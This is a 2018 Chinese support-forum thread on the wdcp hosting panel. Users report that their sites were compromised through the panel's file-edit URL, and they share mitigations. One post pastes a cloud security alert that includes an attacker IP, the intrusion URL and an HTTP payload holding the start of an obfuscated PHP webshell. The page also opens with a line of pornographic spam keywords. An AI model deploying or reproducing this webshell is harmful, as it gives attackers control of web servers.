四虎影视在线影院在线观看,小s货再浪些再咬紧点h,国产精品水嫩水嫩,97精产国品一二三产区

無(wú)標(biāo)題文檔
wdCP系統(tǒng) (介紹,功能特性,運(yùn)行環(huán)境,安裝說(shuō)明,演示,常見(jiàn)問(wèn)題,使用教程) wdCDN系統(tǒng) (介紹,功能特性,運(yùn)行環(huán)境,安裝說(shuō)明,演示,常見(jiàn)問(wèn)題,使用手冊(cè))
wdOS系統(tǒng) (介紹,功能特性,運(yùn)行環(huán)境,安裝說(shuō)明,演示,常見(jiàn)問(wèn)題,使用教程) wdDNS系統(tǒng) (介紹,功能特性,運(yùn)行環(huán)境,安裝說(shuō)明,演示,常見(jiàn)問(wèn)題,使用手冊(cè))
注冊(cè) 發(fā)貼 提問(wèn) 回復(fù)-必看必看 wddns免費(fèi)智能 DNS 開(kāi)通 本地或虛擬機(jī)使 用wdcp 一鍵包在mysql編 譯時(shí)"卡住"
AI導(dǎo)航網(wǎng)AI應(yīng)用網(wǎng)站大全 wdcp官方技術(shù)支持/服務(wù) 阿里云8折優(yōu)惠券 無(wú)敵云 騰訊云優(yōu)惠中,現(xiàn)注冊(cè)更有260代金額券贈(zèng)送
返回列表 發(fā)帖

Rank: 1
1# 跳轉(zhuǎn)到 »
發(fā)表于 2018-11-14 09:32 | 顯示全部帖子
提問(wèn)三步曲: 提問(wèn)先看教程/FAQ索引(wdcp,wdcp_v3,一鍵包)及搜索,會(huì)讓你更快解決問(wèn)題
1 提供詳細(xì),如系統(tǒng)版本,wdcp版本,軟件版本等及錯(cuò)誤的詳細(xì)信息,貼上論壇或截圖發(fā)論壇
2 做過(guò)哪些操作或改動(dòng)設(shè)置等

溫馨提示:信息不詳,很可能會(huì)沒(méi)人理你!論壇有教程說(shuō)明的,也可能沒(méi)人理!因?yàn)?你懂的
XXXX:8080/sys/filee?act=edit&t=f&p=/www/web/XXXXXX/public_html/upload/201612/1482310143.php

我也是經(jīng)常被掛馬
通過(guò)這個(gè)地址掛上來(lái)的。這個(gè)是wdcp的文件吧

TOP

Rank: 1
2#
發(fā)表于 2018-11-14 13:43 | 顯示全部帖子
回復(fù) 9# admin


肯定是沒(méi)有登陸掛馬。通過(guò)這個(gè)地址掛的,是阿里的 態(tài)勢(shì)感知 提示的。并且是能夠通過(guò)這個(gè)寫(xiě)入文件,以下是相關(guān)的信息。請(qǐng)盡快測(cè)試。謝謝!掛了好多馬,并且跟樓主一樣,在主頁(yè)寫(xiě)入了博彩的相關(guān)信息,并進(jìn)行了加密。javascript進(jìn)行解密

疑似攻擊者IP
222.247.108.16
入侵點(diǎn)URL

XXXXXX:8080/sys/filee?act=edit&t=f&p=/www/web/XXXXXXXX/public_html/upload/201612/1482310143.php
Http Payload

------WebKitFormBoundaryYlHudQYI8qGl61Qw
Content-Disposition: form-data; name="fn"

/www/web/XXXXXXX/public_html/upload/201612/1482310143.php
------WebKitFormBoundaryYlHudQYI8qGl61Qw
Content-Disposition: form-data; name="furl"

/sys/file?p=%2fwww%2fweb%2fwww_XXXXX_com%2fpublic_html%2fupload/201612&act=list&t=d
------WebKitFormBoundaryYlHudQYI8qGl61Qw
Content-Disposition: form-data; name="contents"

<?php error_reporting(0);$sr="st"./*+/*+*/"rr"/*+/*+*/."ev";$id=$sr/*+/*+*/("ri"."d_"."si");$rn=$sr/*+/*+*/("em"."an"."er");$dn=$sr/*+/*+*/("em"."anr"."id");$od=$sr/*+/*+*/("ri"."dne"."po");$rd=$sr/*+/*+*/("ri"."dda"."er");$cd=$sr/*+/*+*/("ri"."deso"."lc");$fpc=$sr/*+/*+*/("stn"."etn"."oc_t"."up_e"."lif");$fgc=$sr/*+/*+*/("stn"."etn"."oc_t"."eg_e"."lif");$muf=$sr/*+/*+*/("eli"."f_d"."eda"."olp"."u_e"."vom");$dlform='<form method="post">FN:<input name="fn" size="20" type="text">URL:<input name="url" size="50" type="text"><input type="submit" value="ok"></form>';$ulform='<form method="post" enc
Http user_agent

Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36
被寫(xiě)入的可疑文件路徑

/www/web/XXXXXXpublic_html/upload/201612/1482310143.php
事件說(shuō)明

云盾檢測(cè)到有疑似黑客在通過(guò)WEB漏洞或者WEBSHELL向服務(wù)器寫(xiě)入WEBSHELL文件或可疑的二進(jìn)制文件,請(qǐng)及時(shí)關(guān)注。
解決方案

請(qǐng)及時(shí)排查告警中的URL對(duì)應(yīng)的磁盤(pán)文件是否存在漏洞,或者是否是WEBSHELL,并及時(shí)修復(fù)WEB漏洞及刪除已存在的WEBSHELL文件。如果該URL接口是您網(wǎng)站正常的文件上傳接口,請(qǐng)?jiān)诳刂婆_(tái)點(diǎn)擊標(biāo)記為誤報(bào)或忽略按鈕。

TOP

Rank: 1
3#
發(fā)表于 2018-11-14 15:10 | 顯示全部帖子
目前我做了一個(gè)服務(wù)器策略,臨時(shí)解決。所有目錄不允許寫(xiě)入,upload目錄允許寫(xiě)入但是不允許執(zhí)行

TOP

Rank: 1
4#
發(fā)表于 2018-11-19 08:48 | 顯示全部帖子
回復(fù) 12# admin

你好,管理員,這是阿里態(tài)勢(shì)給出的提示,肯定是沒(méi)有登陸的。密碼我修改過(guò),直接寫(xiě)入的文件。

TOP

Rank: 1
5#
發(fā)表于 2018-11-19 09:02 | 顯示全部帖子
linux系統(tǒng)也沒(méi)有新增用戶,系統(tǒng)漏洞也清理了。

TOP

Rank: 1
6#
發(fā)表于 2018-11-20 14:01 | 顯示全部帖子
回復(fù) 15# admin


wdcp的密碼我修改過(guò)。態(tài)勢(shì)里面提示了四十多條,所有的文件都是通過(guò)這個(gè)地址上傳上來(lái)的。并沒(méi)有干什么壞事,只是修改了主頁(yè)的信息,讓頁(yè)面回跳到首頁(yè)的時(shí)候跳到垃圾頁(yè)面。所有上傳的木馬全部經(jīng)過(guò)的加密處理。感覺(jué)這個(gè)是機(jī)器掃描直接植入的,而不是人工操作的。

TOP

Rank: 1
7#
發(fā)表于 2018-11-20 14:02 | 顯示全部帖子
我現(xiàn)在已經(jīng)吧wdcp修改了端口,也不知道什么原因,無(wú)法訪問(wèn)了,木馬文件我根據(jù)阿里的提示已經(jīng)刪除,先看一段時(shí)間,看是否還能上傳木馬文件。

TOP

返回列表